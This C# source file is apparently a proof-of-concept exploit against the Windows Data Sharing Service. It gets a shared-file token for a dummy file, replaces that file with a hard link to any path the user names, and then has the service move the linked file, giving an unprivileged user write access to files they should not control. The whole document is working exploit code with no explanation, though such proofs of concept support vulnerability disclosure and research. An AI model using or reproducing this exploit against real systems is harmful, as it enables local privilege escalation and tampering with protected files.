﻿using DataSharingServiceCommon;
using NtApiDotNet;
using System;
using System.IO;

namespace PoC
{
    class Program
    {
        static void Main(string[] args)
        {
            try
            {
                if (args.Length < 1)
                {
                    throw new Exception("Usage: specify path to open for write access.");
                }

                string path = Path.GetFullPath(args[0]);
                string dummy_dir = Path.Combine(Path.GetPathRoot(path), Guid.NewGuid().ToString());

                SecurityDescriptor sd = new SecurityDescriptor("D:(A;OICIIO;GA;;;WD)(A;;GA;;;WD)");

                using (var obja = new ObjectAttributes(NtFileUtils.DosFileNameToNt(dummy_dir), AttributeFlags.CaseInsensitive, (NtObject)null, null, sd))
                {
                    using (NtFile.Create(obja, FileAccessRights.MaximumAllowed, NtApiDotNet.FileAttributes.Normal, 
                        FileShareMode.None, FileOpenOptions.DirectoryFile, FileDisposition.Create, null))
                    {
                        Console.WriteLine("Created dummy directory {0}", dummy_dir);
                    }
                }

                string dummy_path = Path.Combine(dummy_dir, "dummy.txt");
                File.WriteAllText(dummy_path, string.Empty);

                DS_SHARE_ACCESS_CONTROL access_control = new DS_SHARE_ACCESS_CONTROL();
                access_control.SharePermission = DS_SHARE_PERMISSION.ReadWrite;
                Api.DSCreateSharedFileToken(dummy_path, access_control, DS_TOKEN_LIFETIME_TYPE.Type0, DS_TOKEN_USAGE.Type0, out string token).Check();
                Console.WriteLine("Token: {0}", token);

                File.Delete(dummy_path);
                using (var file = NtFile.Open(NtFileUtils.DosFileNameToNt(path), null, FileAccessRights.Synchronize))
                {
                    file.CreateHardlink(NtFileUtils.DosFileNameToNt(dummy_path));
                }

                string target_file = Path.Combine(dummy_dir, "new.txt");

                Api.DSMoveFromSharedFile(token, target_file).Check();
                Console.WriteLine("Done");
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
        }
    }
}
